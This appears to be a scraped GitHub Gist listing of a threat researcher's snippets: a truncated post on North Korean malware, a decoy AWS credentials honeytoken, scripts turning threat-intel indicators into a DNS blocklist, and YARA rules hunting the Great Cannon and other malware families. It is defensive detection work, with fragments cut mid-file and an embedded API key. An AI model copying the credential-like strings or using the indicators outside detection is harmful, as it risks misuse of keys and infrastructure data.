
@chrisdoman
chrisdoman / North Korean Cyber-Attacks and Collateral Damage.txt
Created January 19, 2024 19:55
North Korean Cyber-Attacks and Collateral Damage
North Korean Cyber-Attacks and Collateral Damage
February 15, 2018 | Chris Doman
WannaCry was incredibly destructive. The attackers made about $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars.
There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions.
Below we disclose new details on three attacks that have spread out of control: two likely originating from the DPRK, and one targeting the DPRK.
The Voice of Korea and the Rivts Virus
This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet.
cado_lambda.py
import json
import urllib3
import requests
import datetime
import random
import string
import logging
def lambda_handler(event, context):
@chrisdoman
chrisdoman / TestFeed.csv
Last active March 27, 2020 11:06
Test Feed for MISP
indicator,indicator_type,pulse_title,pulse_author,tlp
@chrisdoman
chrisdoman / aws_credentials_honeytoken
Created February 25, 2020 19:07
aws_credentials honeytoken
[default]
aws_access_key_id = AKIAXYZDQCENYTNALZP5
aws_secret_access_key = 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
output = json
region = us-east-2
* This is just a honey token to detect automated scanners looking for AWS keys - this is not a real AWS account! *
@chrisdoman
chrisdoman / otx_blocklist.rpz
Created September 17, 2019 09:47
Sample RPZ blocklist from OTX
@chrisdoman
chrisdoman / get_otx_domains_to_rpz.py
Created September 17, 2019 09:47
get_otx_domains_to_rpz.py
# Short demonstration script to write OTX hostnames to a RPZ format text-file
from OTXv2 import OTXv2
import os
# This is the API key for the user "api_example"
otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad')
events = otx.get_all_indicators(author_name='alienvault')
output = ''
cannon.rule
rule hunt_great_cannon {
    strings:
        $ = "requesttime_list" nocase wide ascii
        $ = "responsetime_list" nocase wide ascii
        $ = "cloudflare_js_validate_url" nocase wide ascii
        $ = "116.255.226.154" nocase wide ascii
        $ = "responsetime-requesttime>TIMEGAP" nocase wide ascii
    condition:
        any of them
}
@chrisdoman
chrisdoman / cannon_samples.js
Created September 2, 2019 17:22
Samples from the Great Cannon
getUrlScanGreatCannonHits.py
'''
Gets possible Great Cannon injections from UrlScan
'''
import requests
import json
# Insert your urlscan API Key
api_key = ''
@chrisdoman
chrisdoman / malware.rules
Created October 1, 2018 19:20
Autogenerated Rules
/*
Yara rules to identify malware families, made by Yabin
Auto-generated - plenty of these rules won't work as they rely on looking for compiled code
*/
rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 {
    strings:
        $a_2 = { 558bebdcdb73a5fdef349bc5b2931e67 }